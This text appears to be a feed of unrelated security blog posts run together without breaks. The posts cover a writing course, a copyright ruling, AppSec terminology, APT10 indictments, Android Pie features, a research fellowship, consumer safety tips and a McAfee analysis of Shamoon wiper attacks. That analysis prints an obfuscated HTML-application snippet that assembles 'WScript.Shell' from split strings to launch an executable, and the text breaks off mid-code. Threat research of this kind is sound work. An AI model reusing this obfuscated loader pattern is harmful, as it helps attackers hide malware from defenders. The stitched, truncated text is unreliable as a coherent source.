I titled the course The Secrets to Successful Cybersecurity Writing: Hack the Reader. Why “hack”? Because strong writers know how to find an opening to their readers’ hearts and minds. This course explains how you can break down your readers’ defenses, and capture their attention to deliver your message—even if they’re too busy or indifferent to others’ writing.

Here are several examples of such “hacking” techniques from course sections that focus on the structure and look of successful security writing:

  • Headings: Use them to sneak in the gist of your message, so your can persuade your readers even if they don’t read the rest of your text.
  • Lists: Rely on them to capture your readers’ attention when they skim your message for key ideas.
  • Figure Captions: Include them to influence the conclusion your readers reach even if they only glance at the graphic. 

This is an unusual opportunity to improve your writing skills without sitting through tedious lectures or writing irrelevant essays. Instead, you’ll make your writing remarkable by learning how to avoid common pitfalls.

For instance, this slide opens the discussion about expressing ideas clearly, concisely, and correctly:

This course is grounded in the idea that you can become a better writer by learning how to spot common problems in others’ writing. This is why the many examples are filled with delightful errors that are as much fun to find as they are to correct.

One of the practical takeaways from the course is a set of checklists you can use to eliminate issues related to your structure, look, words, tone, and information. For example:

The course will help you stand out from other cybersecurity professionals with similar technical skills. It will help you get your executives, clients, and colleagues to notice your contribution, accept your advice, and appreciate your input. You’ll benefit whether you are:

  • A manager or an individual team member
  • A consultant or an internally-focused employee
  • A defender or an attacker
  • An earthling or an alien

You have a limited opportunity to attend a beta version of the course. You will not only get an early adopter discount and bragging rights, but also shape the course for future participants.

Starting around September 2019 you’ll be able to take the course almost exclusively online via the SANS OnDemand platform. If you want me to notify you when the OnDemand version launches, just drop me a note.

Copyright lawsuit over Trump photo use is a press freedom fight, too

Donald Trump crashes a wedding at his Bedminster Golf Club, modified by the author and used without permission under 17 USC § 107

Donald Trump crashes a wedding at his Bedminster Golf Club. Photo modified by the author and used without permission under 17 USC § 107.

In a decision that could have dangerous reverberations for press freedom, a federal district judge ruled last week that Esquire violated a copyright held by a Deutsche Bank vice president when it published his photo of Donald Trump crashing a stranger’s wedding at his New Jersey club.

The photo, snapped on an iPhone and posted to Instagram by another guest, was used to illustrate an article about the president’s unplanned appearances at events at his private venue. Esquire’s parent company Hearst had argued that its inclusion of the photo was a fair use—an argument Judge Gregory Woods rejected in a summary judgment order in Otto v. Hearst last Monday.

That decision could effectively give private individuals—particularly individuals with private access to newsworthy people—inappropriate power to shape or limit the visual coverage of public officials, by allowing them to pick and choose which outlets may run those photos, and under what terms.

Trump’s appearances at his own business locations, from which he and his family still profit, are widely described as evidence of corruption. Images of the president and other public officials at Trump properties have been the basis of dozens of news stories. The photographs themselves are newsworthy and (especially in a time of diminished trust in the media) cannot be substituted by verbal descriptions.

The plaintiff in this case, Jonathan Otto, appears to be willing to license the picture to anybody ready to pay. Indeed, as he texted another wedding guest to whom he had sent the image: “Hey, TMZ & others using my photo above without credit/compensation. You send to anyone? I want my cut.”

But it’s important to note that, if the law deems a license for this sort of photo is necessary, that license would be issued entirely at the discretion of the copyright holder. Otto could offer his photo only to outlets known to provide favorable coverage of the president, say, or charge a rate prohibitive to smaller operations.

It is a bad policy that gives any individual—especially an executive at a bank with extensive financial ties to the president—the power to control whether and how journalists can present newsworthy images to the public.

Instead, judges should interpret the fair use doctrine to give the widest possible berth to journalists. This is consistent with the law. Fair use is determined on a case-by-case basis, but the legal test that judges apply explicitly names “news reporting” as one of the purposes for which it is intended. There are a few technical possibilities for how attorneys and judges can make that argument, but—especially given the potentially ruinous damages associated with copyright violations—the effect must be a firm understanding of broad fair use rights.

Judge Woods nods to such a possibility in a section acknowledging the “fact-driven nature” of fair use analysis, saying:

It is not unreasonable to think that the use could be considered fair in another matter involving a news publisher’s incorporation of a personal photograph. Though the Court did not find fair use in this particular instance, it does not preclude a finding of fair use in in other matters, depending on the balance of the fair use factors. Therefore, the Court emphasizes that a finding of fair use in a matter involving personal photographs used by the media might be readily sustainable on facts other than those presented here.

The circumstances of this photo and its publication, though, precisely fit a fact pattern that needs to be allowed. Some of the facts that Judge Woods ruled weighed against a finding of fair use:

  • The article was about the event depicted in the photo, not about the photo itself. But that will nearly always be the case with news reporting.
  • Esquire included the entire photograph, instead of cropping or editing it. But presenting the audience with the primary source materials is a valuable and important practice, and shouldn’t be discouraged by the law.
  • There is a potential market for such a work because an outlet like TMZ is willing to pay a licensing fee. But the fact that there are willing licensees doesn’t and shouldn’t change the newsworthiness analysis. A single outlet can’t be allowed to render other uses unfair simply by “establishing a market”—especially considering this subject already allegedly worked with a gossip publication to keep other outlets from doing fair reporting.

Fair use is a balancing test, and the ideal of a free press and an informed public outweigh the policy goal of bestowing outsized media influence or a licensing paydays on people who attend weddings at Trump properties.

The situation is especially urgent because of a second New York court ruling issued earlier this year, Goldman v. Breitbart, which cast uncertainty on another time-tested technique for reporting on material sourced from social media sites.

In that case, Judge Katherine Forrest broke with a long-standing rule called the "server test," which says that operators of websites aren’t liable for material that is simply embedded from other sites around the web. In many cases, determining the copyright status of newsworthy images can be prohibitively difficult and time-consuming; the server test simplified that process, giving publishers and journalists an easy rule to follow.

There may be other reasons a publisher wants to serve their own media—to preserve it in case the original is modified or deleted, or to protect the privacy of their readers by limiting third-party assets—but the server test at least sidestepped the copyright considerations. If publishers decide they can no longer rely on the server test, they could be forced to turn more to licensing agreements and fair use.

That case is still proceeding through the court system (delayed in part by the unexpected retirement of Judge Forrest) and both cases are likely wind their ways through eventual appeals. But in the meantime, reporters and publishers are left with fewer safe options for including public and newsworthy images than they had at the beginning of 2018.

Flaws and Vulnerabilities and Exploits – Oh My!

With the slew of terms that exist in the world of application security, it can be difficult to keep them all straight. “Flaws,” “vulnerabilities,” and “exploits” are just a few that are likely on your radar, but what do they mean? If you’ve used these words interchangeably in the past, you’re not alone. They’re easy to confuse with one another, likely because there’s a relationship between all of these terms, however, their distinction is real.

To give you a better idea of how to distinguish between these security issues and the different roles that they play within AppSec, let’s take a closer look at the similarities and differences between flaws, vulnerabilities, and exploits.

Flaws vs. Vulnerabilities

Flaws and vulnerabilities are perhaps the easiest two security defects to mix up, leading many security professionals to wonder what exactly is the difference between the two.

To put it simply, a flaw is an implementation defect that can lead to a vulnerability, and a vulnerability is an exploitable condition within your code that allows an attacker to attack. So, just because a flaw isn’t a vulnerability at the present moment, it doesn’t mean that it can’t become one in the future as environments and architectures change or get updated. Any updates to the architecture or changes in the function of your application can expose your application to attacks that were previously hidden.

Once someone has figured out a way to attack – or exploit – a flaw, the flaw becomes a vulnerability. If you’re still confused, think of it this way: all vulnerabilities are flaws, but not all flaws are vulnerabilities. All flaws have the potential to become vulnerabilities.

For some guidance when it comes to flaws, a helpful resource is MITRE’s Common Weakness Enumeration (CWE) list, which provides a common baseline standard for identifying different classes of weaknesses within application structures that can result in possible vulnerabilities.

Only when there is a realization of a structural defect that can allow for an attack to occur does a vulnerability arise. Vulnerabilities, similarly to flaws, are categorized by MITRE’s Common Vulnerabilities and Exposures (CVE) list. Generally, when we’re looking at CVE entries, these are recognized, publicly-known cybersecurity vulnerabilities within existing codebases. Additionally, you could reference the National Institute of Standards and Technology’s National Vulnerability Database (NVD), which is updated whenever a new vulnerability is added to the CVE dictionary of vulnerabilities. The NVD supplements the CVE list by conducting additional analysis on the vulnerabilities, and by determining the impact that vulnerabilities can have on an organization.


“Exploit” is often used to describe weaknesses in code where hacking can occur, but in reality, it’s a slightly different concept. Rather than being a weakness in code, the term “exploit” refers to a procedure or program intended to take advantage of a vulnerability. Another way to think about it is this – an exploit is a vulnerability “weaponized” for a purpose, and this is because an exploit makes use of a vulnerability to attack a system.

So, to reiterate, rather than being the weakness in the code, an exploit is how you would attack that code. It allows an attacker to utilize the application’s logic against it in a way that was never intended by the developers.

As we can see, all of these concepts have their own unique differences, and yet, they are so closely tied together in the world of application security; flaws exist within a code base that’s being attacked, the flaw being that weakness, the vulnerability being the realization of it, and the exploit being how that vulnerability would be leveraged and attacked.

Testing Methods

Now that you have an understanding of the distinctions between these terms, you might be wondering how to test for flaws and vulnerabilities in your code. After all, step one is awareness, but step two is knowing how to find and prevent these defects from putting your data at risk.

Static Application Security Testing (or SAST) is going to help you find the flaws in your code that could be possible vulnerabilities. Static analysis estimates – but does not prove – the exploitability of these flaws so that you can prioritize which to fix first. Knowing whether or not these flaws are certain vulnerabilities takes more of an understanding of the context in which the application is being run and the architecture of the application.

Your next line of defense comes in the form of Dynamic Application Security Testing (DAST), and Manual Penetration Testing (commonly known as MPT). These testing methods are typically more familiar to developers, as they’ve historically been the common approaches for assessing against application vulnerabilities. Dynamic analysis and MPTs run against a live application, and because they’re testing the code behavior from the outside in, we can actually see if these vulnerabilities are exploitable.

The third type of assessment at your disposal is Software Composition Analysis (SCA). SCA focuses on identifying risks that might be introduced by open source code components and third party libraries. It does this by scanning against an inventory of known, documented vulnerabilities – like the National Vulnerability Database.

While each testing method has unique upsides and drawbacks, they all have their place within the software development lifecycle. By using all three together in an integrated manner, you’ll be able to assess when risk exists within an application, and furthermore, you’ll be protecting yourself at every stage within your SDLC.

To learn even more about these security defects discussed here, and how to remediate them once you’ve found them, check out this webinar.

Indictment of Chinese Hackers Underscores Need for Stronger Cybersecurity

Veracode Chinese Hackers Indicted Spearphishing

According to a newly unsealed indictment, two Chinese nationals working with the Chinese ministry of state security have been charged with hacking a number of U.S. government agencies and corporations. The court filing indicates that Zhu Hua and Zhang Jianguo, members of Advanced Persistent Threat 10 (APT10), used phishing techniques in order to steal intellectual property, confidential business data, and technological information between 2006 and 2018.  

The APT10 Group was able to access more than 40 computers to steal confidential data from the U.S. Department of the Navy, including the personally identifiable information of more than 100,000 Navy personnel. The NASA Goddard Space Center and the space agency’s Jet Propulsion Lab were also named in the filing, according to a report in TechCrunch.

Tailored and Convincing Spearphishing Gave APT10 Unfettered Access

Rather than taking a spray-and-pray approach to their attack, APT10 carefully selected their targets and created tailored email campaigns to trick the recipient into opening malicious Word document attachments and files. The emails appeared to originate from a trusted sender, the filenames and types legitimate, and pertained to something relevant to the victim. An example included in the indictment involved a helicopter manufacturer that received an email with the subject line, “C17 Antenna problems” that included a malicious Microsoft Word attachment named “12-204 Side Load testing.doc.”

This methodology created an air of safety and allowed the email recipients to open the emails and attachments without suspicion or question. The indictment indicates that the malware used in the campaigns typically included customized variants of a remote access Trojan (RAT), including one called Poison Ivy, and keystroke loggers used to steal usernames and passwords as users typed in their credentials.

The “Technology Theft Campaign”

Over the course of this campaign, members of APT10 – including Hua and Jianguo – gained access to approximately 90 computers belonging to commercial and defense technology companies, as well as U.S. Government agencies in at least 12 states. They stole hundreds of gigabytes of sensitive data and targeted the computers of companies across dozens of industries and technologies, including aviation, space and satellite, manufacturing, pharmaceutical, oil and gas exploration and production, communications, computer processing, and maritime.  

The “MSP Theft Campaign”

In 2014, the defendants and co-conspirators in APT10 hacked into the computers and networks for managed service providers (MSP) for businesses and governments around the world. Because MSPs are responsible for remotely managing their clients’ information technology infrastructure – like servers, storage, networking, consulting and support services – the attackers were able to steal intellectual property and confidential business data on a global scale. The indictment states that through one particular MSP, which supports operations for the Southern District of New York, the group was able to access data of clients from 12 different countries across dozens of industries, including banking and finance, healthcare, and biotechnology. The malware used in this campaign was programmed to communicate with domains hosted by DNS service providers that were assigned IP addresses of computers APT10 controlled. In total, the group registered roughly 1,300 unique malicious domains.

Stronger Security Hygiene Is Necessary to Avoid Digital Theft

Although prosecutions are unlikely, the details of the indictment clearly indicate that if a tech company is vulnerable, its valuable intellectual property and personal data can be taken.

“Tech companies aren’t ramping up their security to protect their IP and data commensurate with the value attackers put on the data,” said Veracode CTO Chris Wysopal. “Compromising endpoints with vulnerable Word Documents means there isn’t good endpoint hygiene. Microsoft has recently released Windows Sandbox for Windows Pro and Enterprise users.  It would be a good idea to open externally sourced Word Documents with Word running in Windows Sandbox.”

Android Pie à la mode: Security & Privacy

Posted by Vikrant Nanda and René Mayrhofer, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

There is no better time to talk about Android dessert releases than the holidays because who doesn't love dessert? And what is one of our favorite desserts during the holiday season? Well, pie of course.

In all seriousness, pie is a great analogy because of how the various ingredients turn into multiple layers of goodness: right from the software crust on top to the hardware layer at the bottom. Read on for a summary of security and privacy features introduced in Android Pie this year.
Platform hardening
With Android Pie, we updated File-Based Encryption to support external storage media (such as, expandable storage cards). We also introduced support for metadata encryption where hardware support is present. With filesystem metadata encryption, a single key present at boot time encrypts whatever content is not encrypted by file-based encryption (such as, directory layouts, file sizes, permissions, and creation/modification times).

Android Pie also introduced a BiometricPrompt API that apps can use to provide biometric authentication dialogs (such as, fingerprint prompt) on a device in a modality-agnostic fashion. This functionality creates a standardized look, feel, and placement for the dialog. This kind of standardization gives users more confidence that they're authenticating against a trusted biometric credential checker.

New protections and test cases for the Application Sandbox help ensure all non-privileged apps targeting Android Pie (and all future releases of Android) run in stronger SELinux sandboxes. By providing per-app cryptographic authentication to the sandbox, this protection improves app separation, prevents overriding safe defaults, and (most significantly) prevents apps from making their data widely accessible.
Anti-exploitation improvements
With Android Pie, we expanded our compiler-based security mitigations, which instrument runtime operations to fail safely when undefined behavior occurs.

Control Flow Integrity (CFI) is a security mechanism that disallows changes to the original control flow graph of compiled code. In Android Pie, it has been enabled by default within the media frameworks and other security-critical components, such as for Near Field Communication (NFC) and Bluetooth protocols. We also implemented support for CFI in the Android common kernel, continuing our efforts to harden the kernel in previous Android releases.

Integer Overflow Sanitization is a security technique used to mitigate memory corruption and information disclosure vulnerabilities caused by integer operations. We've expanded our use of Integer Overflow sanitizers by enabling their use in libraries where complex untrusted input is processed or where security vulnerabilities have been reported.
Continued investment in hardware-backed security

One of the highlights of Android Pie is Android Protected Confirmation, the first major mobile OS API that leverages a hardware-protected user interface (Trusted UI) to perform critical transactions completely outside the main mobile operating system. Developers can use this API to display a trusted UI prompt to the user, requesting approval via a physical protected input (such as, a button on the device). The resulting cryptographically signed statement allows the relying party to reaffirm that the user would like to complete a sensitive transaction through their app.

We also introduced support for a new Keystore type that provides stronger protection for private keys by leveraging tamper-resistant hardware with dedicated CPU, RAM, and flash memory. StrongBox Keymaster is an implementation of the Keymaster hardware abstraction layer (HAL) that resides in a hardware security module. This module is designed and required to have its own processor, secure storage, True Random Number Generator (TRNG), side-channel resistance, and tamper-resistant packaging.

Other Keystore features (as part of Keymaster 4) include Keyguard-bound keys, Secure Key Import, 3DES support, and version binding. Keyguard-bound keys enable use restriction so as to protect sensitive information. Secure Key Import facilitates secure key use while protecting key material from the application or operating system. You can read more about these features in our recent blog post as well as the accompanying release notes.
Enhancing user privacy

User privacy has been boosted with several behavior changes, such as limiting the access background apps have to the camera, microphone, and device sensors. New permission rules and permission groups have been created for phone calls, phone state, and Wi-Fi scans, as well as restrictions around information retrieved from Wi-Fi scans. We have also added associated MAC address randomization, so that a device can use a different network address when connecting to a Wi-Fi network.

On top of that, Android Pie added support for encrypting Android backups with the user's screen lock secret (that is, PIN, pattern, or password). By design, this means that an attacker would not be able to access a user's backed-up application data without specifically knowing their passcode. Auto backup for apps has been enhanced by providing developers a way to specify conditions under which their app's data is excluded from auto backup. For example, Android Pie introduces a new flag to determine whether a user's backup is client-side encrypted.

As part of a larger effort to move all web traffic away from cleartext (unencrypted HTTP) and towards being secured with TLS (HTTPS), we changed the defaults for Network Security Configuration to block all cleartext traffic. We're protecting users with TLS by default, unless you explicitly opt-in to cleartext for specific domains. Android Pie also adds built-in support for DNS over TLS, automatically upgrading DNS queries to TLS if a network's DNS server supports it. This protects information about IP addresses visited from being sniffed or intercepted on the network level.

We believe that the features described in this post advance the security and privacy posture of Android, but you don't have to take our word for it. Year after year our continued efforts are demonstrably resulting in better protection as evidenced by increasing exploit difficulty and independent mobile security ratings. Now go and enjoy some actual pie while we get back to preparing the next Android dessert release!

Making Android more secure requires a combination of hardening the platform and advancing anti-exploitation techniques.

Acknowledgements: This post leveraged contributions from Chad Brubaker, Janis Danisevskis, Giles Hogben, Troy Kensinger, Ivan Lozano, Vishwath Mohan, Frank Salim, Sami Tolvanen, Lilian Young, and Shawn Willden.

DOJ charges two Chinese nationals with ‘extensive’ hacking campaign

Today, the Department of Justice announced charges against Zhu Hua and Zhang Shilong, two Chinese nationals who engaged in an extensive hacking campaign against the US and other countries. First reported by CNBC, the campaign was allegedly successful at infiltrating at least 45 US and global technology companies and government agencies, and these actions were taken at the behest of the Chinese government. Incredibly, the hackers have been operating since 2006 through this year, according to the DOJ. This comes a week after the NSA warned it had evidence of China preparing for "high-profile" cyber-attacks.

Source: Department of Justice

$10,000 research fellowships for underrepresented talent

The Trail of Bits SummerCon Fellowship program is now accepting applications from emerging security researchers with excellent project ideas. Fellows will explore their research topics with our guidance and then present their findings at SummerCon 2019. We will be reserving at least 50% of our funding for marginalized, female-identifying, transgender, and non-binary candidates. If you’re interested in applying, read on!

Why we’re doing this

Inclusion is a serious and persistent issue for the infosec industry. According to the 2017 (ISC)2 report on Women in Cybersecurity, only 11% of the cybersecurity workforce identify as women–-a deficient proportion that hasn’t changed since 2013. Based on a 2018 (ISC)2 study, the issue is worse for women of color, who report facing pervasive discrimination, unexplained denial or delay in career advancement, exaggerated highlights of mistakes and errors, and tokenism.

Not only is this ethically objectionable, it makes no business sense. In 2012, Mckinsey & Company found–-with ‘startling consistency’—that “for companies ranking in the top quartile of executive-board diversity, Returns on Equity (ROE) were 53 percent higher, on average, than they were for those in the bottom quartile. At the same time, Earnings Before Tax and Interest (EBTI) margins at the most diverse companies were 14 percent higher, on average, than those of the least diverse companies.”

The problem is particularly conspicuous at infosec conferences: a dearth of non-white non-male speakers, few female attendees, and pervasive reports of sexual discrimination. That’s why Trail of Bits and one of the longest-running hacker conferences, SummerCon, decided to collaborate to combat the issue. Through this fellowship, we’re sponsoring and mentoring emerging talent that might not otherwise get enough funding, mentorship, and exposure, and then shining a spotlight on their research.

Funding and mentorship to elevate your security research

The Trail of Bits SummerCon Fellowship provides awarded fellows with:

  • $10,000 grant to fund a six-month security research project
  • Dedicated research mentorship from a security engineer at Trail of Bits
  • An invitation to present findings at SummerCon 2019

50% of the program spots are reserved for marginalized, people of color, female-identifying, transgender, and non-binary candidates. Applicants of all genders, races, ethnicities, sexual orientations, ages, and abilities are encouraged to apply.

The research topics we’ll support

Applicants should bring a low-level programming or security research project that they’ve been wanting to tackle but have lacked the time or resources to pursue. They’ll have strong skills in low-level or systems programming, reverse engineering, program analysis (including dynamic binary instrumentation, symbolic execution, and abstract interpretation), or vulnerability analysis.

We’re especially interested in research ideas that align with our areas of expertise. That way, we can better support applicants. Think along the lines of:

How do I apply?

Apply here!

We’re accepting applications until January 15th. We’ll announce fellowship recipients in February.

Interested in applying? Go for it!

Submissions will be judged by a panel of experts from the SummerCon foundation, including Trail of Bits. Good luck!

How to Get Technology Working for You This Christmas

Harnessing the power of the internet and technology this Christmas may just be what you need to get over this extraordinarily stressful period. While many of you maybe all sorted for the big day, there are still many of us who aren’t.

Many of us are still attending daily Christmas gatherings, still working, still trying to entertain kids, shop & most importantly, work out what we are going to serve to 25 people on Christmas day!!

So, let me share with you my top tips on how we can all use the wonders of the internet and technology to get through:

  1. E-Cards

If you haven’t done these yet – and let’s be honest very few do now – then scrap this idea immediately. But if your guilt just can’t be silenced then check out ecards. I personally love Smilebox but Lifewire has put together a list of the top ecard sites. But remember, always use a reputable site so your recipients as more likely to open them. Cybercrims have been known to send unsuspecting recipients ecards with the aim of trying to extract their personal information.

  1. Online Gift Shopping

Getting to the bottom of the Christmas gift list takes time. So, if you still have presents to buy then avoid the crowds and get online. There are still plenty of retailers who are guaranteeing delivery before Christmas. So, make yourself a cup of tea and set the timer for an hour. You’ll be surprised how much you can get done when you have a deadline! has put together a list of the top 50 Australian shopping sites – check it out! I do have to disclose I have a soft spot for Peter’s of Kensington, Country Road and Myer online. Great service and speedy delivery!

But please remember to observe safe online shopping habits. Only buy from trusted retailers, look for a padlock at the start of a web address to ensure transactions are encrypted, avoid offers that are ‘too good to be true’ and don’t ever use public Wi-Fi to do your shopping.

  1. Get Some Extra Help Online

If you haven’t yet used Airtasker to help you work through your to-do list, then you need to start ASAP. Airtasker brings jobs and helpers together in an easy to use app. If your house needs a clean or the garden needs a makeover before the relatives arrive, then log on and create a job and wait for Airtaskers to bid on it. So easy!

  1. Create an Online To-Do List

There’s nothing like a bit of planning to reduce pressure. Why not create a to-do list in Google Docs or an Excel spreadsheet to identify which family member is responsible for what on the big day? Alternatively, you could create your to-do list in an app like Todoist and then send each person’s task directly to their inbox? Very organised indeed!

So, let’s all take a deep breath. Christmas 2018 is going to be fantastic. Let’s get technology working for us so we can get through our to-do lists and be super parents – even though we all know they just don’t exist!

Merry Christmas

Alex xx

The post How to Get Technology Working for You This Christmas appeared first on McAfee Blogs.

All I want for Christmas: A CISO’s Wishlist!

As Christmas fast approaches, CISOs and cyber security experts around the world are busy putting plans in place for 2019 and reflecting on what could have been done differently this year. The high-profile data breaches have been no secret - from British Airways to Dixons Carphone to Ticketmaster - and the introduction of GDPR in May 2018 sent many IT professionals into a frenzy to ensure practices and procedures were in place to become compliant with the new regulation.

What the introduction of GDPR did demonstrate was that organisations should no longer focus on security strategies, which protect the organisation’s network, but instead focus on Information Assurance (IA) which protects an organisation’s data. After all - if an organisation’s data is breached, not only will it face huge fallouts of reputational damage, hits to the organisation’s bottom line and future prospecting difficulties, but it will also be held accountable to regulatory fines - up to as much as €20 million, or 4% annual global turnover under GDPR. Stolen or compromised data is, therefore, an enormous risk to an organisation.

So, with the festivities upon us and many longing to see gifts under the tree, CISOs may be thinking about what they want for Christmas this year to make sure their organisation is kept secure into the new year and beyond. Paul German, CEO, Certes Networks, outlines three things that should be at the top of the list. 

1. Backing from the Board
Every CISO wants buy-in from the Board; and there’s no escaping from the fact that cyber security must become a Board-level priority. However, whilst the correct security mindset must start at the top, in reality it also needs to be embedded across all practices within an organisation; extending beyond the security team to legal, finance and even marketing. The responsibility of securing the entirety of the organisation’s data sits with the CISO, but the catastrophic risks of a cybersecurity failure means that it must be given consideration by the entire Board and become a top priority in meeting business objectives. Quite simply, a Board that acknowledges the importance of having a robust, innovative and comprehensive strategy in place is a CISO’s dream come true.

2. A Simple Approach
A complicated security strategy is the last thing any CISO wants to manage. The industry has over-complicated network security for too long and has fundamentally failed. As organisations have layered technology on top of technology, not only has the technology stack itself become complex, but the amount of resources and operational overhead needed to manage it has contributed to mounting costs. A much more simple approach is needed, which involves starting with a security overlay with will cover the networks, independent of the infrastructure, rather than taking the narrow approach of building the strategy around the infrastructure. From a data security perspective, the network must become irrelevant, and with this flows a natural simplicity in approach.

3. A Future-Proof Solution
The cyber landscape is constantly evolving; with new threats introduced and technology appearing that just adds to the sophisticated tools that hackers have at their disposal. What a CISO longs for is a solution that keeps the organisation’s data secure, irrespective of new users or applications added, and regardless of location or device. By adopting a software-defined approach to data security, which centrally enforces capabilities such as software-defined application access control, data-in-motion privacy, cryptographic segmentation and a software-defined perimeter, CISOs can ensure that data is protected in its entirety on its journey across whatever network it goes across while hackers are restricted from moving laterally across the network once a breach has occurred. Furthermore, the solution can protect an organisation’s data not only in its present state, but into the future. By enforcing a solution that is software-defined, a CISO can centrally orchestrate the security policy without impacting network performance, and changes can be made to the policy without pausing the protection in place. 

Three Simple Wishes
High-profile data breaches won’t go away any time soon, so it is the organisations that have the correct mindset, with Board-level buy-in and a unified approach to securing data that will see the long-term advantages. Complicated, static and siloed approaches to securing an organisation’s data should be a thing of the past, so the good news is that, in reality, everything on a CISOs Christmas wish list is attainable (although not able to be wrapped), and should become a reality in the new year.

Paul German, CEO, Certes Networks

The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube are often prone to links for fake websites and apps so criminals can make money off of downloads. Avoid falling victim to these frauds and only download software straight from a company’s home page.
  • Click with caution. Only click on links in text messages that are from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with the message.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use a robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Homeon Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

Its the most wonderful time of the year – Patching

does that say patching plaster or patch faster? 😉

Remember back when Summer and Christmas break was a high time of concern.  The kids were out of college and ready to try out their skills.  Christmas was worse because so many people were out of the office, no one would notice.  Or if they did the response would be limited.   Now that’s what we call Tuesday afternoon.  Now days, the sysadmins have to deal not just with college code projects, but insider threat, money motivated attackers, and nation states.

This week, Microsoft’s “out-of-band” security update reminded me of the old times.    An out-of-band update is simply a unscheduled one.  Its released out of the regular schedule because it is currently being exploited.  This lends a sense of urgency.    Some companies may have already bypassed December updates because of staffing, or scheduling.  Anyone in retail certainly has a change freeze in effect.  Now on top of that there is a special update for Internet Explorer.

Information about the update for Internet Explorer is available here : 

The post Its the most wonderful time of the year – Patching appeared first on Roger's Information Security Blog.

Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Used to read a list of targeted computers created by the attackers. This tool is responsible to run the second tool, spreader.exe, with the list of each targeted machine.
  • Spreader.exe: Used to spread the file eraser in each machine previously set. It also gets information about the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.
  • SlHost.exe: The new wiper, which browses the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack


How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://

Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)


zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

